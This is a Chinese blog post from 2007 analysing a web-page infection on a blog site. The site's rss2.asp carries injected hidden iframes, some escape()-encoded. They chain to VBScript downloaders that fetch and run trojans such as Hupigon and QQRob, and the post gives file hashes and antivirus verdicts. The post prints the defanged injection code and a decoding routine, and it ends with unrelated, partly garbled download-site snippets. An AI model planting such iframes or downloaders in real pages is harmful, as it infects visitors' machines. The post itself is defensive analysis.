endurer 原创
2007-03-31 第3版 补充瑞星 的反应
2007-03-29 第2版 补充kaspersky 的反应
2007-03-29 第1版
该博客网的rss2.asp包含代码:
/---
<SCRIPT>var Words="%*3*Cht*ml%3E%3Ciframe src%3D%22hxxp%3A%2F%2Fkmx%2E**zl**f*j**j%2Ecom%2Findex%2Ehtm%22 name%3D%22zhu%22 width%3D%220%22 height%3D%220%22 frameborder%3D%220%22%3E%3C%2Fhtml%3E%0D%0A%0D%0A%0D%0A";document.write(unescape(Words))</SCRIPT> <Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/index.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>
<Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/ndex.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe><Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/index.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>
<Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/ndex.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>
---/
变量Words的值解密后的内容为:
/---
<html><iframe src="hxxp://k***m**x*.z***l*f**j*j.com/index.htm" name="zhu" width="0" height="0" frameborder="0"></html>
";document.write(unescape(Words))</SCRIPT> <SCRIPT>var Words="<html><iframe src="hxxp://k***m**x*.z***l*f**j*j.com/index.htm" name="zhu" width="0" height="0" frameborder="0"></html>
---/
hxxp://k***m**x*.z***l*f**j*j.com/index.htm包含代码:
/---
<iframe src="hxxp://www.m**h***5**5**.cn/g****z****/g****z****.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://k***m**x*.z***l*f**j*j.com/jb.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.z***l*f**j*j.com/321.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.z***l*f**j*j.com/123.htm" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.m**h***5**5**.cn/g****z****/g****z****.htm中的脚本代码功能是用unescape()解码字符串值并输出。
输出内容为VBScript脚本,功能是使用自定义函数:
/---
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
---/
解密变量t的值并执行。
解密后的变量t值为VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 gz.exe,保存为 %temp%/leren.bat,并利用Shell.Application 对象 Q 的 ShellExecute 方法来运行。
文件说明符 : D:/test/gz.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-29 12:41:59
修改时间 : 2007-3-29 12:41:59
访问时间 : 2007-3-29 0:0:0
大小 : 387584 字节 378.512 KB
MD5 : 8b1e57e69f958e004fc743188e4f63c4
Kaspersky 报为 Backdoor.Win32.Hupigon.emk[KLAB-1900585]
瑞星 报为Backdoor.Gpigeon.sbi(病毒上报邮件分析结果-流水单号:6239851)
我们将在较新的19.16.42版本(瑞星2006的18.72.42版本)中处理解决,请您届时将您的瑞星软件升级到19.16.42(瑞星2006的18.72.42版本)版本并且打开监控中心全盘杀毒。如果我们在测试过程中发现问题的话,我们会推迟一到两版本后升级。
hxxp://k***m**x*.z***l*f**j*j.com/jb.htm(卡巴报为:Trojan-Downloader.VBS.Small.dc)内容为VBScript脚本代码,功能是输出信息:“你好,您所访问的页面正在加载中...请稍候片刻....”,同时利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 jb.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象 zhonghuae 的 ShellExecute 方法来运行。
文件说明符 : D:/test/jb.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-29 12:39:38
修改时间 : 2007-3-29 12:39:40
访问时间 : 2007-3-29 0:0:0
大小 : 5632 字节 5.512 KB
MD5 : ee5a215b736b733ec2caed16fb413a29
Kaspersky 报为 Trojan.Win32.Agent.aic [KLAB-1900058]
瑞星 报为 Trojan.Mnless.hpg(病毒上报邮件分析结果-流水单号:6239566)
hxxp://www.z***l*f**j*j.com/321.htm 内容为VBScript脚本代码,功能是输出信息:“你好,您所访问的页面正在加载中...请稍候片刻....”,同时利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 321.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象 zhonghuae 的 ShellExecute 方法来运行。
文件说明符 : D:/test/321.exe
属性 : A---
语言 : 英语(美国)
文件版本 : 5.2.3790.1830
说明 : Generic Host Process for Win32 Services
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 5.2.3790.1830
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : rpcs.exe
源文件名 : rpcs.exe
创建时间 : 2007-3-29 12:39:38
修改时间 : 2007-3-29 12:41:12
访问时间 : 2007-3-29 0:0:0
大小 : 109606 字节 107.38 KB
MD5 : 9adeac121907c9ea7ad2b1dad7834bc6
Kaspersky 报为 Trojan-PSW.Win32.QQRob.km
瑞星 报为 Trojan.PSW.QQRobber.bkv(病毒上报邮件分析结果-流水单号:6239566)
hxxp://www.z***l*f**j*j.com/123.htm 内容为VBScript脚本代码,功能是输出信息:“你好,您所访问的页面正在加载中...请稍候片刻....”,同时利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 123.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象 zhonghuae 的 ShellExecute 方法来运行。
文件说明符 : D:/test/123.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-29 12:39:38
修改时间 : 2007-3-29 12:43:34
访问时间 : 2007-3-29 0:0:0
大小 : 298121 字节 291.137 KB
MD5 : b6b5bd850c28a1843fc5195fa09d52c7
Kaspersky 报为 Backdoor.Win32.Hupigon.crx[KLAB-1900585]
瑞星 报为 Trojan.Mnless.hpf(病毒上报邮件分析结果-流水单号:6239566)
hxxp://zhang8**5*9**.g**o*1***.icpcn.com/index.htm (瑞星报为:Trojan.DL.VBS.Agent.clg)内容为JavaScript脚本代码,功能是用String.fromCharCode()解码变量t的值并输出。
解码后的变量t的值为VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 010.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象 Xe 的 ShellExecute 方法来运行。
文件说明符 : d:/test/010.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-29 12:35:2
修改时间 : 2007-3-29 12:35:6
访问时间 : 2007-3-29 0:0:0
大小 : 413184 字节 403.512 KB
MD5 : 8181fd58e26227d57915fa25ce26234e
Kaspersky 报为 Backdoor.Win32.Hupigon.avg[KLAB-1900585]
瑞星 报为 Backdoor.Gpigeon.sbg(病毒上报邮件分析结果-流水单号:6239423)
分享到:
相关推荐
官方离线安装包,亲测可用
下面以新浪博客为例说明一下使用方法: 首先去新浪申请一个帐号 再把你列表的内容复制到工具的列表内容框中,然后按“开始加密” 再把加密好的内容复制一下,去新浪博客里写一遍日志 日志标题随便写 内容为刚才...
GitHubDesktopSetup-领悟360CLASS=HTMLKf3c07916ba15bb92b9a47eab17f8cae2ca302599CLASS=...死密沓!microsoft.administer@emAIL.CNCLASS=HTMLK
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
Atom-nim-planet.zip,Nim RSS feed planet at https://planet.nim-lang.org尼姆星球,atom是一个用web技术构建的开源文本编辑器。
于是2001年一个联合小组在0.90版本RSS的开发原则下,以W3C新一代的语义网技术RDF(Resource Description Framework)为基础,对RSS进行了重新定义,发布RSS1.0,并将RSS定义为“RDF Site Summary”。但是这项工作...
位姿精度是机构的重要性能指标,也是并联机构结构分析的难点之一。针对在3-RSS/S并联机构...通过三维建模方法验证了数值计算的正确性,通过算例验证了该方法的可行性与有效性,为3-RSS/S并联机构的精度研究奠定了基础。
基于java的开发源码-XML写的RSS阅读器.zip 基于java的开发源码-XML写的RSS阅读器.zip 基于java的开发源码-XML写的RSS阅读器.zip 基于java的开发源码-XML写的RSS阅读器.zip 基于java的开发源码-XML写的RSS阅读器.zip ...
[新闻文章]lylina rss 多用户聚合系统源码 (中文utf-8版)_rss.at1.cn.zip
NVD:https://nvd.nist.gov/feeds/xml/cve/misc/nvd-rss-analyzed.xml CNNVD:http://www.cnnvd.org.cn/web/vulnerability/querylist.tag Tenable (Nessus):https://www.tenable.com/cve/feeds?sort=newest 爬取到...
标签:archiva-rss-1.4-M2-javadoc.jar,archiva,rss,1.4,M2,javadoc,jar包下载,依赖包
标签:archiva-rss-1.4-M2-sources.jar,archiva,rss,1.4,M2,sources,jar包下载,依赖包
标签:archiva-rss-1.4-M3-sources.jar,archiva,rss,1.4,M3,sources,jar包下载,依赖包
标签:archiva-rss-1.4-M3-javadoc.jar,archiva,rss,1.4,M3,javadoc,jar包下载,依赖包
包括以下网站的各种频道的rss源,由于特殊需求,我对其进行了分类,使用excel制作,方便排序 5.2.1 新浪新闻RSS http://rss.sina.com.cn/ 5.2.2 腾讯新闻RSS http://rss.qq.com/ 需要考察腾讯有哪些地方站RSS 5.2.3...
响应式海运空运国际货运物 ...Disallow: /plus/rss.php Disallow: /plus/search.php Disallow: /plus/recommend.php Disallow: /plus/stow.php Disallow: /plus/count.php Disallow: /include Disallow: /templets
商业编程-源码-利用Jquery实现的RSS阅读器.zip
ad-rss-lib下载异常慢,百度自动驾驶Apollo在做build的时候经常因为超时下载失败,可以通过docker cp命令将该包copy到容器里面去
标签:abdera-extensions-rss-1.1.3-sources.jar,abdera,extensions,rss,1.1.3,sources,jar包下载,依赖包
Atom-feeds-to-pocket.zip,从rss和atom提要向pocket发送条目(https://getpocket.com)馈送至口袋,atom是一个用web技术构建的开源文本编辑器。